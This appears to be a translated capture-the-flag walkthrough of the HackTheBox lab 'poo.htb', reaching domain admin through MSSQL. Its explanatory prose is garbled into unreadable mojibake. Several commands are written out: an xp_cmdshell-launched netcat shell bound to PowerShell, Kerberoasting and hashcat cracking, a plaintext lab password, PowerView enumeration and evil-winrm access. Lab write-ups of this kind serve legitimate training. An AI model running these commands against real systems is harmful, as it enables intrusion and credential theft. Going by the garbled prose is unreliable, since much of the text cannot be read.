เบเบญเบเบเบตเปเปเบซเปเปเบฎเบปเบฒเบญเบฑเบเปเบซเบฅเบเปเบเบฃเปเบเบฃเบกเปเบชเปเปเบเบตเบเปเบงเบต
เบเบญเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเปเบเบตเบเบเบปเบงเบเบนเปเบเบฑเบเบเปเบฒเบ MSSQL.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
เปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเปเบเบทเปเบญเบกเบเปเปเบเปเบฒเบเบเบปเบงเปเบเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ.
proxychains rlwrap nc poo.htb 4321
เปเบฅเบฐเบเปเปเบซเปเปเบเปเบฎเบฑเบ hashes เปเบเป.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
เบเปเปเปเบ, เบเปเบฒเบเบเปเบฒเปเบเบฑเบเบเปเบญเบเปเบเป iterate เปเบเปเบฅเบเบฐ hashes เปเบซเบผเบปเปเบฒเบเบตเป. เปเบเบทเปเบญเบเบเบฒเบเบงเบฑเบเบเบฐเบเบฒเบเบธเบเบปเบก rockyou เบเปเปเบกเบตเบฅเบฐเบซเบฑเบเบเปเบฒเบเปเบซเบผเบปเปเบฒเบเบตเป, เบเปเบญเบเปเบเปเปเบเปเบงเบฑเบเบเบฐเบเบฒเบเบธเบเบปเบกเบฅเบฐเบซเบฑเบเบเปเบฒเบเบเบฑเบเปเบปเบเบเบตเปเบฅเบฐเบเบธเปเบงเปเปเบ Seclists. เบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบปเปเบเบซเบฒเบเบงเบเปเบฎเบปเบฒเปเบเป hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
เปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเบเบญเบเบซเบฒเบฅเบฐเบซเบฑเบเบเปเบฒเบเบเบฑเบเบชเบญเบ, เบเปเบฒเบญเบดเบเปเบเบงเบฑเบเบเบฐเบเบฒเบเบธเบเบปเบก dutch_passwordlist.txt, เปเบฅเบฐเบเบตเบชเบญเบเปเบ Keyboard-Combinations.txt.
เปเบฅเบฐเบเบฑเปเบเบเบฑเปเบเบเบงเบเปเบฎเบปเบฒเบกเบตเบเบนเปเปเบเปเบชเบฒเบกเบเบปเบ, เปเบซเปเปเบเบซเบฒเบเบปเบงเบเบงเบเบเบธเบกเปเบเปเบกเบ. เปเบซเปเบเบญเบเบซเบฒเบเบตเปเบขเบนเปเบเบญเบเบฅเบฒเบงเบเปเบญเบ.
เบเบดเปเบเปเบซเบเป, เบเบงเบเปเบฎเบปเบฒเปเบเปเบเบปเบเปเบซเบฑเบเบเบตเปเบขเบนเป IP เบเบญเบเบเบปเบงเบเบงเบเบเบธเบกเปเบเปเบกเบ. เปเบซเปเบเบญเบเบซเบฒเบเบนเปเปเบเปเบเบฑเบเบซเบกเบปเบเบเบญเบเปเบเปเบกเบ, เปเบเบฑเปเบเบเบฝเบงเบเบฑเบเบเบฑเบเบเบงเบเปเบเบปเบฒเปเบกเปเบเบเบนเปเบเปเบฅเบดเบซเบฒเบ. เปเบเบทเปเบญเบเบฒเบงเปเบซเบฅเบเบชเบฐเบเบฃเบดเบเปเบเบทเปเบญเปเบซเปเปเบเปเบเปเปเบกเบนเบ PowerView.ps1. เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบ, เบเบงเบเปเบฎเบปเบฒเบเบฐเปเบเบทเปเบญเบกเบเปเปเปเบเบเปเบเป evil-winrm, เบฅเบฐเบเบธเปเบเปเบฅเบเบฐเบเปเบฅเบตเบเบตเปเบกเบต script เปเบเบเบฒเบฅเบฒเบกเบดเปเบเบต -s. เปเบฅเบฐเบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบเบงเบเปเบฎเบปเบฒเบเบฐเบเบฝเบเปเบเปเปเบซเบฅเบเบชเบฐเบเบดเบ PowerView.
เปเบเบเบฑเบเบเบธเบเบฑเบเบเบงเบเปเบฎเบปเบฒเบกเบตเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบซเบเปเบฒเบเบตเปเบเบญเบเบกเบฑเบเบเบฑเบเบซเบกเบปเบ. เบเบนเปเปเบเป p00_adm เปเบเบดเปเบเบเบทเบงเปเบฒเปเบเบฑเบเบเบนเปเปเบเปเบเบตเปเบกเบตเบชเบดเบเบเบดเบเบดเปเบชเบ, เบเบฑเปเบเบเบฑเปเบเบเบงเบเปเบฎเบปเบฒเบเบฐเปเบฎเบฑเบเบงเบฝเบเบขเบนเปเปเบเบชเบฐเบเบฒเบเบเบฒเบเบเบญเบเบฅเบฒเบง. เบกเบฒเบชเปเบฒเบเบงเบฑเบเบเบธ PSCredential เบชเปเบฒเบฅเบฑเบเบเบนเปเปเบเปเบเบตเป.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
เปเบเบเบฑเบเบเบธเบเบฑเบเบเปเบฒเบชเบฑเปเบ Powershell เบเบฑเบเบซเบกเบปเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเปเบฒเบเบปเบ Creds เบเบฐเบเบทเบเบเบฐเบเบดเบเบฑเบเปเบเบฑเบ p00_adm. เปเบซเปเบชเบฐเปเบเบเบฅเบฒเบเบเบทเปเบเบนเปเปเบเปเปเบฅเบฐเบเบธเบเบฅเบฑเบเบชเบฐเบเบฐ AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
เปเบฅเบฐเบเบฑเปเบเบเบฑเปเบ, เบเบนเปเปเบเปเบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบเบชเบดเบเบเบดเบเบดเปเบชเบเปเบเปเป. เบฅเบญเบเปเบเบดเปเบเบงเปเบฒเบฅเบฒเบงเบขเบนเปเปเบเบเบธเปเบกเปเบ.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
เบเบงเบเปเบฎเบปเบฒเบชเบธเบเบเปเบฒเบเบขเบทเบเบขเบฑเบเบงเปเบฒเบเบนเปเปเบเปเปเบเบฑเบเบเบนเปเปเบเบดเปเบเปเบเบเปเบเปเบกเบ. เบเบตเปเปเบฎเบฑเบเปเบซเปเบฅเบฒเบงเบกเบตเบชเบดเบเบเบตเปเบเบฐเปเบเบปเปเบฒเบชเบนเปเบฅเบฐเบเบปเบเบเบปเบงเบเบงเบเบเบธเบกเปเบเปเบกเบเบเบฒเบเปเบฅเบเบฐเปเบ. เบฅเบญเบเปเบเบปเปเบฒเบชเบนเปเบฅเบฐเบเบปเบเบเปเบฒเบ WinRM เปเบเบเปเบเปเบญเบธเปเบกเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ. เบเปเบฒเบเบฐเปเบเบปเปเบฒเปเบเปเบชเบฑเบเบชเบปเบเปเบเบเบเบงเบฒเบกเบเบดเบเบเบฒเบเบเบตเปเบเบฐเบฅเบดเบเปเบเบ reGeorg เปเบเปเบงเบฅเบฒเบเบตเปเปเบเป evil-winrm.
เปเบฅเปเบงเปเบซเปเปเบเปเบญเบฑเบเบญเบทเปเบ, เบเปเบฒเบเบเบงเปเบฒ,
เบเบงเบเปเบฎเบปเบฒเบเบฐเบเบฒเบเบฒเบกเปเบเบทเปเบญเบกเบเปเป, เปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเบขเบนเปเปเบเบฅเบฐเบเบปเบ.
เปเบเปเบเปเปเบกเบตเบเบธเบ. เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบ, เปเบเบดเปเบเบเบนเปเปเบเปเปเบฅเบฐเบเบงเบเปเบเบดเปเบ desktop.
เบเบงเบเปเบฎเบปเบฒเบเบญเบเบซเบฒเบเบธเบเบขเบนเป mr3ks เปเบฅเบฐเบซเปเบญเบเบเบปเบเบฅเบญเบเปเบกเปเบเบชเปเบฒเปเบฅเบฑเบ 100%.
เบซเบกเบปเบโเปเบเบปเปเบฒโเบเบตเป. เปเบเบเบฒเบเบฐเปเบเบฑเบเบเปเบฒเบเบดเบเบปเบก, เบเบฐเบฅเบธเบเบฒเบชเบฐเปเบเบเบเบงเบฒเบกเบเบดเบเปเบซเบฑเบเบงเปเบฒเบเปเบฒเบเปเบเปเบฎเบฝเบเบฎเบนเปเบซเบเบฑเบเปเบซเบกเปเบเบฒเบเบเบปเบเบเบงเบฒเบกเบเบตเปเปเบฅเบฐเบงเปเบฒเบกเบฑเบเปเบเบฑเบเบเบฐเปเบซเบเบเบชเปเบฒเบฅเบฑเบเบเปเบฒเบ.
เบเปเบฒเบเบชเบฒเบกเบฒเบเปเบเบปเปเบฒเบฎเปเบงเบกเบเบฑเบเบเบงเบเปเบฎเบปเบฒเปเบเปเบเบตเป
เปเบซเบผเปเบเบเปเปเบกเบนเบ: www.habr.com